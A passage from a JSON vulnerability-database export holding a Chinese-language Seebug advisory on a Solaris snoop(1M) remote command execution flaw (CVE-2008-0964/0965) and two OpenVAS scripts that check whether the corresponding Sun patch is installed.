Solaris\u662f\u4e00\u6b3e\u5546\u4e1a\u6027\u8d28\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nsnoop(1M)\u7f51\u7edc\u5de5\u5177\u76f8\u5173\u7684SMB\u901a\u4fe1\u663e\u793a\u5b58\u5728\u5b89\u5168\u95ee\u9898\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5'nobody'\u6743\u9650\u6216\u5176\u4ed6\u672c\u5730\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\r\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u6f0f\u6d1e\u7ec6\u8282\u63d0\u4f9b\u3002\r\n\u5982\u4e0b\u5e73\u53f0\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\uff1a\r\nSolaris 10\r\nSolaris 9\r\nSolaris 8\r\nOpenSolaris builds snv_01 to snv_95\r\n\n\nSun Solaris 9_x86\r\nSun Solaris 9\r\nSun Solaris 8_x86\r\nSun Solaris 8\r\nSun Solaris 10_x86\r\nSun Solaris 10\r\nSun OpenSolaris build snv_95\r\nSun OpenSolaris build snv_92 \r\nSun OpenSolaris build snv_91\r\nSun OpenSolaris build snv_89\r\nSun OpenSolaris build snv_88\r\nSun OpenSolaris build snv_64\r\nSun OpenSolaris build snv_22\r\nSun OpenSolaris build snv_19\r\nSun OpenSolaris build snv_13\r\nSun OpenSolaris build snv_02\r\nSun OpenSolaris build snv_01\r\n\n \u53ef\u53c2\u8003\u5982\u4e0b\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\n<a href=http://sunsolve.sun.com/search/document.do?assetkey=1-66-240101-1 target=_blank>http://sunsolve.sun.com/search/document.do?assetkey=1-66-240101-1</a>", "reporter": "Root", "published": "2008-08-07T00:00:00", "title": "Sun Solaris 'snoop(1M)'\u5de5\u5177\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2008-08-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3803", "id": "SSV:3803", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "details"}], "openvas": [{"lastseen": "2018-04-09T11:39:54", "references": ["http://sunsolve.sun.com/search/document.do?assetkey=1-21-114262-05-1", "114262-05"], "pluginID": "1361412562310855119", "description": "Check for the Version of snoop", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-06-03T00:00:00", "title": "Solaris Update for snoop 114262-05", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855119", "id": "OPENVAS:1361412562310855119", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for snoop 114262-05\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"snoop on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n snoop\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855119\");\n script_version(\"$Revision: 9370 $\");\n script_cve_id(\"CVE-2008-0964\", \"CVE-2008-0965\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:24:08 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114262-05\");\n script_name( \"Solaris Update for snoop 114262-05\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114262-05-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of snoop\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"114262-05\", package:\"SUNWrcmdc\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:00", "references": ["http://sunsolve.sun.com/search/document.do?assetkey=1-21-114262-05-1", "114262-05"], "pluginID": "855119", "description": "Check for the Version of snoop", "edition": 1, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-06-03T00:00:00", "title": "Solaris Update for snoop 114262-05", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "modified": "2017-02-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=855119", "id": "OPENVAS:855119", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for snoop 114262-05\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"snoop on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n snoop\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855119);\n script_version(\"$Revision: 5359 $\");\n script_cve_id(\"CVE-2008-0964\", \"CVE-2008-0965\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:24:08 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114262-05\");\n script_name( \"Solaris Update for snoop 114262-05\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114262-05-1\");\n\n script_summary(\"Check for the Version of snoop\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"114262-05\", package:\"SUNWrcmdc\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
